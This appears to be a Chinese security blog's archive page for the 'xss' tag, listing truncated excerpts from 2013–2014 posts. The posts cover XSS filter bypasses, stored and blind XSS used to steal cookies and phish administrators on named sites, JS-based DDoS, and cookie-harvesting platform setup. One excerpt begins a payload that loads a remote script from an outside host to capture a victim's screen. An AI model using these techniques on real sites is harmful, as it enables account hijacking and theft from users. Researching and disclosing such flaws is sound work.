xss

admin 11年前 (2014-01-11) 4095浏览 2评论

看了@jinglingshu同学的利用asp/asp.net+IIS特性绕过防注入后，就一时兴起，看了他的防XSS的正则。下一面引用其中的核心部分代码： $getfilter = "<[^>]*?=[^>]*?&#...

admin 11年前 (2014-01-04) 1734浏览 0评论

浅谈跨域web攻击 EMail: rayh4c#80sec.com Site: http://www.80sec.com Date: 2011-04-07 From: http://www.80sec.com 0×00 前言 一直想说说跨域web攻...

admin 11年前 (2014-01-04) 1775浏览 0评论

深掘XSS漏洞场景之XSS Rootkit[完整修订版] EMail: rayh4c#80sec.com Site: http://www.80sec.com Date: 2011-10-15 0×00 前言 众所周知XSS漏洞的风险定义一直比较模...

admin 12年前 (2013-11-04) 1923浏览 0评论

后台灰盒+exp被限制40字符+script等标签被过滤。 很多人祭出0day bypass，没必要。先分析场景。最爽的是我看到场景使用了jquery，在昨天的一个攻击场景下，我推测那后台用jquery是必然的。 于是简短强悍的exp如： 1. e...

admin 12年前 (2013-11-04) 2324浏览 0评论

浏览器特性导致，firefox与chrome是默认这样的。IE8默认不会。其他的不关心不测试。 浏览器在用户登录时，会提示用户是否记住密码： 1、对于firefox，用户有三个选择：记住、不记录本站、暂不。 2、对于chorme，用户只有在输入正确密...

admin 12年前 (2013-10-23) 2951浏览 0评论

一、按键事件 二、按键码与按键字符 三、其他按键属性 四、浏览器兼容性总结 五、代码实现 六、总结 一、按键事件 浏览器有三种键盘按键事件:keyup、keydown、keypress，对应的事件处理函数有onkeyup、onkeydown、onke...

admin 12年前 (2013-09-29) 1658浏览 0评论

XSS可以做什么？ 窃取信息，worm攻击，钓鱼欺骗，DDOS。。。 那XSS之分布式破解又是怎么回事呢？？ XSS是基于用户PC而非服务器的，那么被X的量肯定是很大滴，比如一个百度贴吧的xss分分钟就可以让你的收信箱爆掉，那为何我们不好好利用这些P...

admin 12年前 (2013-09-21) 2201浏览 0评论

一个具有学习意义的XSS过滤器绕过 详细说明： 天涯过滤了一切JavaScript，治标不治本 漏洞证明： 这是目标页面 m.tianya.cn/sch/sch.jsp 1.我们先提交test试试 输出在了value属性 2.接下来我们用 R...

admin 12年前 (2013-09-16) 1675浏览 0评论

简要描述： 晚上在人人网随便转了转，随手测试了下，发现人人网某分站存在储存型xss，可以盲打后台管理，也可以盗取他人登录cookie（已经证明）。上传位置也有些问题，我做了初步检测，你们自己仔细查查吧，请别给个位数的rank额。 详细说明： 1 存在...

admin 12年前 (2013-09-04) 1455浏览 0评论

晚上睡不着，起来撸管子 突然想起最近在研究盲打xss 无聊用反馈手机应用的不足 发现反馈即没有过滤也没有限制 直接xss 我和我的小弟弟都惊呆了 早上起来收cookies 百度的打不开，可能是只允许内网登录 剩下的慢慢研究吧，关于利用cook...

admin 12年前 (2013-08-24) 1619浏览 0评论

这个漏洞在酷狗旗下的繁星网： fanxing.kugou.com 情景再现：     情况分析： 繁星网相册处因为对上传的文件名没有做很好的过滤，我们只要开启抓包软件 看到提交的数据是： ——...

admin 12年前 (2013-08-20) 2242浏览 0评论

2个月前，长短短（Sogili）在群里发了一个html2canvas.js  并给了一个POC 我写了一个完整的js来获得对方的屏幕截图 看代码 document.write("<script src=\"http:\/\/xj.hk\/h...

admin 12年前 (2013-07-23) 1709浏览 0评论

对会员发布信息没过滤，可直接插入xss 注册个用户，直接到会员管理后台 点发布相册 在公司名称写入<script都行… 然后就等管理人员上来，这边就收COOKIE了 这里显示的后台是 http://upload.oodii.c...

admin 12年前 (2013-07-17) 1837浏览 0评论

发布日期：2011-12-08 09:00:00 浏览次数：2982 文章作者：Nuclear’Atk 网友评论：12 评论 最后修改：2012-12-04 12:40:0 关于：基于js的CC攻击实现与防御、以及图片方式的DDOS、CC...

admin 12年前 (2013-07-15) 3183浏览 1评论

其实很多公司、厂商及其他XXOO的都不太注重XSS的安全，特别是反射型。。理由是：%*(&$@)%(%)反正就是没危害怎么滴？ 好吧，让我来谈谈反射XSS的一个“危害”吧~~（仅供手机测试） 大家都知道，手机网页有些链接，一点击就会自动弹出短...

admin 12年前 (2013-06-30) 1521浏览 0评论

搭建好xsser.me平台后，可以正常使用来进行跨站了。但是，发现平台接收到xss时间有出入不是准确的时间。由于服务器是在美国，所以怀疑时间不对是因为php时区设置的原因。 翻了一下源码，在config.php中有时区设置，当时根据教程改为$conf...

admin 12年前 (2013-06-29) 2067浏览 0评论

上一篇中介绍了圈圈网通过xss和基础钓鱼获取管理员账号口令信息，在此详细介绍。 一、基础钓鱼利用 1、登陆圈圈网http://www.ihelpoo.com/后在个人主页上可以“记录生活”，与其他位置不同的是此处图片允许从输入网络图片地址，但未对图片...

admin 12年前 (2013-06-27) 15515浏览 3评论

搭建过程： 本例以http://127.0.0.1/ xssplatform作为例子讲解搭建过程。 一、数据库修改 新建以数据库如xsser，编码为utf8。将xssplatform.sql文件导入数据库。 执行以下命令修改数据库： UPDATE o...

admin 12年前 (2013-06-22) 2190浏览 0评论

HttpOnly简介 故名思议，HttpOnly是指仅在HTTP层面上传输的Cookie，当设置了HttpOnly标志后，客户端脚本就无法读写该Cookie，这样能有效的防御XSS攻击。HttpOnly是由微软在2002年首先在Internet E...

admin 12年前 (2013-06-19) 2449浏览 0评论

漏洞作者： 心伤的瘦子 提交时间： 2012-12-13 17:45 公开时间： 2013-01-27 17:46 漏洞类型： xss跨站脚本攻击 危害等级： 低 前面教程第2节，说到了输出在<script>..</script&g...